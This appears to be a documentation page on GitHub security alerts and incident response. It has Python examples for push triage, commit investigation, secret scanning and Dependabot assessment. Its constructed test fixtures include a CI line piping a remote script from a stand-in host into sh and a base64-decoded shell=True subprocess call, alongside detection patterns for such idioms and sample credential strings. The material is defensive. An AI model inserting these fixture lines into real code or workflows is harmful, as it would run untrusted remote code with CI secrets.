# Alert Types & Response

Learn about the different types of GitHub security alerts and how to respond to them effectively.

## Alert Types

### Critical Alerts

**Secret Exposure**: API keys, tokens, or credentials committed to the repository.

* **Action**: Immediately rotate all exposed credentials. Treat them as compromised even if the commit is later removed; anything pushed to GitHub may already have been cloned or scraped
* **Prevention**: Run a secret-scanning pre-commit hook, and enable GitHub secret scanning with push protection so the push is rejected before the secret lands

**Author Mismatch on Protected Branch**: Commit from an unrecognized author on the main/production branch.

* **Action**: Investigate immediately; this may indicate a compromised account or a forged author header (git records whatever name and email the client supplies, so an unsigned author identity proves nothing)
* **Prevention**: Require signed commits (GPG/SSH) in the branch protection rule so unsigned or unverifiable commits are rejected

**Force Push to Protected Branch**: Git history rewritten on a critical branch.

* **Action**: Compare the old and new head (the push event carries both SHAs), review what was dropped, and restore it from a clone or the reflog if necessary
* **Prevention**: Block force pushes, and branch deletion, in the branch protection rule

### High Priority Alerts

**Critical Dependency Vulnerability**: Dependabot reports a critical severity vulnerability.

* **Action**: Update the dependency within 48 hours; if no patched version exists, apply a mitigation and record the accepted risk
* **Prevention**: Enable automated dependency updates (Dependabot version updates)

**New Admin Access**: User granted admin permissions to a repository.

* **Action**: Verify the grant was authorized and check the organization audit log for who made it
* **Prevention**: Limit admin access and follow the least privilege principle

**Suspicious Commit Pattern**: Multiple unusual indicators (timing, location, size) on one commit.

* **Action**: Review the commit contents and contact the author through a channel other than GitHub
* **Prevention**: Require commit signing, enable 2FA

### Medium Priority Alerts

**High/Medium Severity Dependencies**: Dependabot alerts for non-critical vulnerabilities.

* **Action**: Schedule update in next sprint
* **Prevention**: Regular dependency update cycles

**Missing Branch Protection**: Critical repository lacks branch protection rules.

* **Action**: Configure branch protection
* **Prevention**: Repository template with security defaults

**Unusual Collaborator Addition**: New outside collaborator added.

* **Action**: Verify need for access, review permissions
* **Prevention**: Regular access reviews
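
The three push-related alerts above (force push, author mismatch, suspicious commit pattern) can be derived from a single GitHub `push` webhook payload. The following is an added example, not Sentry/Auditware code: it triages a constructed payload against those rules. `PROTECTED_BRANCHES`, `TRUSTED_AUTHORS`, `BUSINESS_HOURS` and the size threshold are assumed site policy, not fields GitHub provides; the field names read from the event (`ref`, `forced`, `pusher`, `commits[].author`, `commits[].committer`, `commits[].added/modified/removed`, `timestamp`) are those of the real `push` event.

```python
"""Triage a GitHub `push` webhook payload against the push-related alert types.

Added example, not Sentry/Auditware code. SAMPLE_PUSH is constructed.
PROTECTED_BRANCHES, TRUSTED_AUTHORS, BUSINESS_HOURS and LARGE_COMMIT_FILES
are assumed site-specific policy.
"""
from __future__ import annotations

from datetime import datetime, timezone

PROTECTED_BRANCHES = {"main", "production"}                  # assumption: policy
TRUSTED_AUTHORS = {"alice@example.com", "bob@example.com"}   # assumption: known contributors
BUSINESS_HOURS = range(7, 20)                                # assumption: 07:00-19:59 UTC
LARGE_COMMIT_FILES = 25                                      # assumption: "size" threshold
SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2}


def branch_of(ref: str) -> str:
    """'refs/heads/main' -> 'main'; tags and other refs are returned unchanged."""
    prefix = "refs/heads/"
    return ref[len(prefix):] if ref.startswith(prefix) else ref


def commit_indicators(commit: dict) -> list[str]:
    """The 'unusual' signals behind the Suspicious Commit Pattern alert."""
    indicators = []
    ts = datetime.fromisoformat(commit["timestamp"]).astimezone(timezone.utc)
    if ts.hour not in BUSINESS_HOURS:
        indicators.append(f"outside business hours ({ts:%H:%M} UTC)")
    touched = sum(len(commit.get(k, [])) for k in ("added", "modified", "removed"))
    if touched >= LARGE_COMMIT_FILES:
        indicators.append(f"large change ({touched} files)")
    # Author and committer normally match; a mismatch means a rebase/cherry-pick
    # by someone else, or a forged author header.
    if commit["author"]["email"].lower() != commit["committer"]["email"].lower():
        indicators.append("author and committer differ")
    return indicators


def triage_push(event: dict) -> list[dict]:
    """Return alerts raised by one push event, highest severity first."""
    findings = []
    branch = branch_of(event["ref"])
    protected = branch in PROTECTED_BRANCHES
    repo = event["repository"]["full_name"]

    if protected and event.get("forced"):
        findings.append({"severity": "critical", "alert": "Force Push to Protected Branch",
                         "detail": f"{event['pusher']['name']} force-pushed {repo}@{branch}"})

    for commit in event.get("commits", []):
        email = commit["author"]["email"].lower()
        short = commit["id"][:7]
        if protected and email not in TRUSTED_AUTHORS:
            findings.append({"severity": "critical", "alert": "Author Mismatch on Protected Branch",
                             "detail": f"{short} on {branch} authored by unrecognised {email}"})
        indicators = commit_indicators(commit)
        if len(indicators) >= 2:  # one oddity is noise; two or more is a pattern
            findings.append({"severity": "high", "alert": "Suspicious Commit Pattern",
                             "detail": f"{short}: " + "; ".join(indicators)})

    findings.sort(key=lambda f: SEVERITY_RANK[f["severity"]])  # stable: keeps check order within a level
    return findings


# Constructed payload: a 03:14 UTC force push to main from a look-alike author address.
SAMPLE_PUSH = {
    "ref": "refs/heads/main",
    "forced": True,
    "pusher": {"name": "mallory"},
    "repository": {"full_name": "acme/payments"},
    "commits": [
        {
            "id": "a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0",
            "timestamp": "2024-05-12T03:14:00+00:00",
            "message": "fix",
            "author": {"name": "Alice", "email": "alice@examp1e.com", "username": "a1ice"},
            "committer": {"name": "mallory", "email": "mallory@evil.example", "username": "mallory"},
            "added": [], "removed": [],
            "modified": [f"src/module_{i}.py" for i in range(40)],
        },
        {
            "id": "d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3",
            "timestamp": "2024-05-12T10:00:00+00:00",
            "message": "Update README",
            "author": {"name": "Bob", "email": "bob@example.com", "username": "bob"},
            "committer": {"name": "Bob", "email": "bob@example.com", "username": "bob"},
            "added": [], "removed": [], "modified": ["README.md"],
        },
    ],
}
# Same repository, an ordinary daytime push of only the second commit.
CLEAN_PUSH = {**SAMPLE_PUSH, "forced": False, "commits": SAMPLE_PUSH["commits"][1:]}

if __name__ == "__main__":
    for finding in triage_push(SAMPLE_PUSH):
        print(f"[{finding['severity']}] {finding['alert']}: {finding['detail']}")
```

The two-indicator threshold is the important design choice: any single signal (a late-night commit, a big refactor) fires constantly on a real team, so the medium-confidence "pattern" alert only triggers when signals coincide, while the two critical alerts fire on a single hard fact.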

## Taking Action

### Investigating Commits

When a suspicious commit is detected:

1. Review the commit diff in GitHub, paying particular attention to CI workflow files, build scripts and dependency manifests
2. Check the commit author's recent activity, and whether the commit is signed and shows as verified
3. Verify with the supposed author via a separate channel (not GitHub, in case the account is compromised)
4. Scan the commit for malicious code patterns (remote scripts piped to a shell, encoded payloads, dynamic code execution)
5. If malicious, revert it with a new commit rather than rewriting history (preserve the evidence), and rotate any credentials the commit or the CI run it triggered could have reached
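
The checklist above, applied to one commit object in the shape returned by the GitHub REST API (`GET /repos/{owner}/{repo}/commits/{sha}`), as an added example that is not Sentry/Auditware code. `SAMPLE_COMMIT` is constructed; the pattern list in `SUSPICIOUS_PATTERNS` is an assumed starting point, not an exhaustive rule set. The fields read (`commit.author`, `commit.committer`, `commit.verification.verified/reason`, top-level `author`, `files[].filename`, `files[].patch`) are those of the real API object.

```python
"""Investigate one GitHub commit object: signature, identity and content checks.

Added example, not Sentry/Auditware code. SAMPLE_COMMIT / CLEAN_COMMIT are
constructed; SUSPICIOUS_PATTERNS is an assumed starting rule set.
"""
from __future__ import annotations

import re

SUSPICIOUS_PATTERNS = {
    "remote script piped to shell": re.compile(r"(curl|wget)[^|\n]*\|\s*(ba|z)?sh\b"),
    "base64-decoded payload": re.compile(r"base64\.b64decode\(|base64\s+(-d|--decode)\b"),
    "dynamic code execution": re.compile(r"\b(eval|exec)\s*\("),
    "shell=True subprocess": re.compile(r"shell\s*=\s*True"),
}
WORKFLOW_PATH = re.compile(r"^\.github/workflows/.*\.ya?ml$")


def added_lines(patch: str) -> list[str]:
    """Lines the commit introduces: unified-diff '+' lines, minus the '+++' file header."""
    return [ln[1:] for ln in patch.splitlines() if ln.startswith("+") and not ln.startswith("+++")]


def investigate_commit(commit: dict) -> list[dict]:
    """Return findings; an empty list means nothing on the checklist tripped."""
    findings = []
    meta = commit["commit"]
    verification = meta.get("verification") or {}

    # 1. Signature: 'verified' is GitHub's own check; 'reason' says why it failed
    #    (e.g. "unsigned", "unknown_key", "bad_email").
    if not verification.get("verified"):
        findings.append({"check": "unsigned_commit",
                         "detail": f"verification={verification.get('reason', 'unknown')}"})

    # 2. Author vs committer: they differ after a rebase/cherry-pick by someone else,
    #    or when the author header was forged.
    a_email = meta["author"]["email"].lower()
    c_email = meta["committer"]["email"].lower()
    if a_email != c_email:
        findings.append({"check": "author_committer_mismatch",
                         "detail": f"author={a_email} committer={c_email}"})

    # 3. Top-level 'author' is null when the email maps to no GitHub account:
    #    the identity is header text only, trivially forged.
    if commit.get("author") is None:
        findings.append({"check": "author_not_linked", "detail": f"{a_email} maps to no GitHub user"})

    # 4. Content: CI/workflow edits, and malicious-code idioms in the added lines only.
    for f in commit.get("files", []):
        if WORKFLOW_PATH.match(f["filename"]):
            findings.append({"check": "workflow_changed", "detail": f["filename"]})
        for line in added_lines(f.get("patch", "")):
            for label, pattern in SUSPICIOUS_PATTERNS.items():
                if pattern.search(line):
                    findings.append({"check": "suspicious_pattern",
                                     "detail": f"{f['filename']}: {label}: {line.strip()}"})
    return findings


# Constructed: unsigned commit, forged author, encoded payload run via a shell, CI edit.
SAMPLE_COMMIT = {
    "sha": "9f1c0e2b5d8a4c7e1f3b6a9d2c5e8b1a4d7f0c3e",
    "commit": {
        "author": {"name": "Alice", "email": "alice@example.com", "date": "2024-05-12T03:14:00Z"},
        "committer": {"name": "Mallory", "email": "mallory@evil.example", "date": "2024-05-12T03:14:00Z"},
        "message": "fix flaky test",
        "verification": {"verified": False, "reason": "unsigned", "signature": None, "payload": None},
    },
    "author": None,
    "committer": {"login": "mallory"},
    "files": [
        {"filename": "tests/conftest.py", "status": "modified", "additions": 2, "deletions": 0,
         "patch": ("@@ -1,3 +1,5 @@\n import os\n+import base64, subprocess\n"
                   "+subprocess.run(base64.b64decode(b'Y3VybCAuLi4=').decode(), shell=True)\n"
                   " def pytest_configure(config):\n     pass")},
        {"filename": ".github/workflows/ci.yml", "status": "modified", "additions": 1, "deletions": 0,
         "patch": ("@@ -10,3 +10,4 @@\n       - run: pytest\n"
                   "+      - run: curl -s https://example.invalid/setup.sh | sh\n")},
    ],
}
# Constructed: a signed, self-committed docs change by a linked account.
CLEAN_COMMIT = {
    "sha": "0c3e9f1c0e2b5d8a4c7e1f3b6a9d2c5e8b1a4d7f",
    "commit": {
        "author": {"name": "Alice", "email": "alice@example.com", "date": "2024-05-12T10:00:00Z"},
        "committer": {"name": "Alice", "email": "alice@example.com", "date": "2024-05-12T10:00:00Z"},
        "message": "docs: clarify setup",
        "verification": {"verified": True, "reason": "valid", "signature": "-----BEGIN PGP SIGNATURE-----", "payload": "tree ..."},
    },
    "author": {"login": "alice"},
    "committer": {"login": "alice"},
    "files": [{"filename": "README.md", "status": "modified", "additions": 1, "deletions": 0,
               "patch": "@@ -1,2 +1,3 @@\n # Setup\n+Run make install first.\n"}],
}

if __name__ == "__main__":
    for finding in investigate_commit(SAMPLE_COMMIT):
        print(f"{finding['check']}: {finding['detail']}")
```

Only added lines are scanned: the patterns would otherwise fire on the removal of bad code, which is the opposite of what the investigation is looking for. A hit on `workflow_changed` deserves the same scrutiny as a code hit, because a workflow edit runs with the repository's CI secrets.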

### Responding to Secret Exposure

1. **Immediate**: Revoke/rotate the exposed credential
2. **Investigation**: Check the provider's access logs for use of the credential between the exposure and the revocation
3. **Remediation**: Remove the secret from git history (`git filter-repo` or BFG Repo-Cleaner; `git filter-branch` is deprecated), force-push the rewritten history and have collaborators re-clone. Rewriting history does not unpublish anything: the old commits stay reachable by SHA, and in forks and pull request refs, until GitHub Support purges them, which is why step 1 comes first
4. **Prevention**: Add a detection pattern for that credential type (never the secret value itself) to git-secrets, gitleaks or a similar pre-commit tool
5. **Documentation**: Log the incident for security review
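
Step 4 in practice: the check a pre-commit hook or CI gate runs over `git diff --cached -U0` before a commit is accepted. This is an added example, not Sentry/Auditware code or any particular tool's implementation. The rules and the entropy threshold are assumed starting values; `SAMPLE_DIFF` is constructed (the AWS key is the placeholder key from AWS's own documentation, the GitHub token is fabricated), and the `# pragma: allowlist secret` marker is borrowed from detect-secrets as an assumed convention for test fixtures.

```python
"""Scan a unified diff for committed secrets (pre-commit / CI gate).

Added example, not Sentry/Auditware code. RULES and ENTROPY_THRESHOLD are
assumed starting values; SAMPLE_DIFF is constructed.
"""
from __future__ import annotations

import math
import re
import subprocess
import sys

ENTROPY_THRESHOLD = 3.5                         # assumption: bits/char below which a value is a placeholder
ALLOWLIST_MARKER = "pragma: allowlist secret"   # assumption: inline marker for known-fake fixtures
HUNK_RE = re.compile(r"^@@ -\d+(?:,\d+)? \+(\d+)(?:,\d+)? @@")

# (name, pattern, apply entropy filter). Specific formats first, generic last.
RULES = [
    ("aws_access_key_id", re.compile(r"\bAKIA[0-9A-Z]{16}\b"), False),
    ("github_pat", re.compile(r"\bghp_[A-Za-z0-9]{36}\b"), False),
    ("private_key", re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH |DSA )?PRIVATE KEY-----"), False),
    ("generic_credential",
     re.compile(r"(?i)(?:api[_-]?key|secret|token|password)\w*\s*[=:]\s*['\"]?([A-Za-z0-9_\-/+=]{16,})"),
     True),
]


def shannon_entropy(s: str) -> float:
    """Bits per character: ~4.7 for random base64, 0.0 for a repeated character."""
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def scan_diff(diff: str) -> list[dict]:
    """Report secrets in lines the diff adds. Removed lines are history, not new exposure."""
    findings = []
    filename = None
    new_lineno = 0
    for raw in diff.splitlines():
        if raw.startswith("+++ "):
            filename = raw[4:]
            filename = filename[2:] if filename.startswith("b/") else filename
            continue
        hunk = HUNK_RE.match(raw)
        if hunk:
            new_lineno = int(hunk.group(1))
            continue
        if raw.startswith("+"):
            line, lineno = raw[1:], new_lineno
            new_lineno += 1
        elif raw.startswith(" "):
            new_lineno += 1          # context line: advances the new-file line counter
            continue
        else:
            continue                 # '-' lines, diff/index headers, '\ No newline' markers
        if ALLOWLIST_MARKER in line:
            continue
        for name, pattern, check_entropy in RULES:
            m = pattern.search(line)
            if not m:
                continue
            value = m.group(1) if m.groups() else m.group(0)
            if check_entropy and shannon_entropy(value) < ENTROPY_THRESHOLD:
                continue             # "xxxxxxxx" / "changeme" style placeholder
            findings.append({"file": filename, "line": lineno, "rule": name,
                             "value": value[:4] + "..."})   # never echo the full secret
            break                    # one report per line is enough
    return findings


# Constructed staged diff: one real-format key, one real-format token, one placeholder,
# one allow-listed fixture, and a removed line that must not be reported.
SAMPLE_DIFF = """\
diff --git a/config.py b/config.py
--- a/config.py
+++ b/config.py
@@ -1,2 +1,5 @@
 DEBUG = False
-API_KEY = "changeme"
+AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
+GITHUB_TOKEN = "ghp_A1b2C3d4E5f6G7h8I9j0K1l2M3n4O5p6Q7r8"
+API_KEY = "xxxxxxxxxxxxxxxxxxxx"
+TEST_TOKEN = "ghp_A1b2C3d4E5f6G7h8I9j0K1l2M3n4O5p6Q7r8"  # pragma: allowlist secret
"""


def main() -> int:
    """Pre-commit entry point: non-zero exit blocks the commit."""
    diff = subprocess.run(["git", "diff", "--cached", "-U0"],
                          capture_output=True, text=True, check=True).stdout
    hits = scan_diff(diff)
    for h in hits:
        print(f"{h['file']}:{h['line']}: {h['rule']} ({h['value']})", file=sys.stderr)
    return 1 if hits else 0


if __name__ == "__main__":
    sys.exit(main())
```

Two details matter for a hook like this: it only looks at added lines, so deleting a leaked key does not re-trigger it, and the generic rule is gated on entropy, so `API_KEY = "xxxxxxxx"` in a sample config does not stop every commit. The allowlist marker is the escape hatch for intentionally fake fixtures; it should never be used on a real value.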

### Dependency Vulnerability Management

1. **Assess Impact**: Confirm the version actually locked in the repository falls inside the vulnerable range, then determine whether the vulnerable code path is reachable
2. **Check Patches**: Review available updates and breaking changes
3. **Test Locally**: Update and test in a development environment
4. **Deploy**: Roll out the update following normal change management
5. **Verify**: Confirm the Dependabot alert is resolved (it closes once the manifest no longer pins a version in the range)
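
Steps 1 and 5 as code: evaluate the alert's `vulnerable_version_range` against the version in the lockfile, and re-run the same check after the bump. This is an added example, not Sentry/Auditware code. The alert objects follow the shape of `GET /repos/{owner}/{repo}/dependabot/alerts` (`state`, `dependency.package.name`, `security_advisory.severity`, `security_vulnerability.vulnerable_version_range`, `security_vulnerability.first_patched_version`), but the alerts, package names and lockfile below are constructed, and the version comparison assumes plain dotted numeric versions (pre-release tags are ignored).

```python
"""Decide which open Dependabot alerts actually apply to the locked versions.

Added example, not Sentry/Auditware code. SAMPLE_ALERTS and LOCKFILE are
constructed with fictional packages. Assumes numeric dotted versions.
"""
from __future__ import annotations

import re

SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2, "low": 3}
CLAUSE_RE = re.compile(r"^(>=|<=|>|<|=)\s*([0-9][0-9A-Za-z.\-]*)$")


def parse_version(text: str) -> tuple[int, ...]:
    """'4.17.21' -> (4, 17, 21); padded so '1.2' == '1.2.0'. Pre-release suffixes are dropped."""
    numbers = [int(n) for n in re.findall(r"\d+", text.split("-")[0])[:3]]
    return tuple(numbers + [0] * (3 - len(numbers)))


def in_range(version: str, vulnerable_range: str) -> bool:
    """Evaluate a Dependabot range such as '>= 4.0.0, < 4.17.21' (every clause must hold)."""
    v = parse_version(version)
    for clause in vulnerable_range.split(","):
        m = CLAUSE_RE.match(clause.strip())
        if not m:
            raise ValueError(f"unparseable range clause: {clause!r}")
        op, bound = m.group(1), parse_version(m.group(2))
        holds = {">=": v >= bound, "<=": v <= bound, ">": v > bound, "<": v < bound, "=": v == bound}[op]
        if not holds:
            return False
    return True


def assess_alerts(alerts: list[dict], lockfile: dict[str, str]) -> list[dict]:
    """Classify each open alert as affected / not_affected / not_in_lockfile, most severe first."""
    results = []
    for alert in alerts:
        if alert["state"] != "open":
            continue
        pkg = alert["dependency"]["package"]["name"]
        vuln = alert["security_vulnerability"]
        installed = lockfile.get(pkg)
        if installed is None:
            status = "not_in_lockfile"   # transitive or removed: resolve the full tree before dismissing
        elif in_range(installed, vuln["vulnerable_version_range"]):
            status = "affected"
        else:
            status = "not_affected"      # already past the range: verify, then close as stale
        patched = vuln.get("first_patched_version") or {}   # null in the API when no fix exists
        results.append({"number": alert["number"], "package": pkg, "installed": installed,
                        "severity": alert["security_advisory"]["severity"],
                        "status": status, "fix": patched.get("identifier")})
    results.sort(key=lambda r: SEVERITY_RANK[r["severity"]])
    return results


def _alert(number, state, name, severity, vrange, fix):
    """Build a constructed alert in the REST API's shape."""
    return {"number": number, "state": state,
            "dependency": {"package": {"ecosystem": "npm", "name": name}, "manifest_path": "package-lock.json"},
            "security_advisory": {"severity": severity, "summary": f"constructed advisory for {name}"},
            "security_vulnerability": {"vulnerable_version_range": vrange,
                                       "first_patched_version": {"identifier": fix} if fix else None}}


SAMPLE_ALERTS = [  # constructed
    _alert(7, "open", "acme-parser", "high", ">= 4.0.0, < 4.17.21", "4.17.21"),
    _alert(9, "open", "acme-http", "critical", "< 2.1.0", "2.1.0"),
    _alert(11, "open", "acme-yaml", "medium", "<= 1.4.3", None),
    _alert(3, "dismissed", "acme-old", "low", "< 0.9.0", "0.9.0"),
]
LOCKFILE = {"acme-parser": "4.17.15", "acme-http": "2.1.3"}   # constructed: acme-yaml not pinned

if __name__ == "__main__":
    for r in assess_alerts(SAMPLE_ALERTS, LOCKFILE):
        print(f"#{r['number']} [{r['severity']}] {r['package']}={r['installed']}: {r['status']} (fix: {r['fix']})")
    # Verify step: after bumping acme-parser the same check should report not_affected.
    after = assess_alerts(SAMPLE_ALERTS, {**LOCKFILE, "acme-parser": "4.17.21"})
    print([ (r["package"], r["status"]) for r in after ])
```

`not_in_lockfile` is deliberately not treated as "not affected": Dependabot raises alerts for transitive dependencies too, so a package missing from the top-level pins may still be resolved deeper in the tree.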

{% hint style="warning" %}
**Important**: Always verify alerts through a separate communication channel. Attackers holding a compromised account may dismiss or hide alerts, so also review the audit log for alert dismissals and branch protection changes.
{% endhint %}
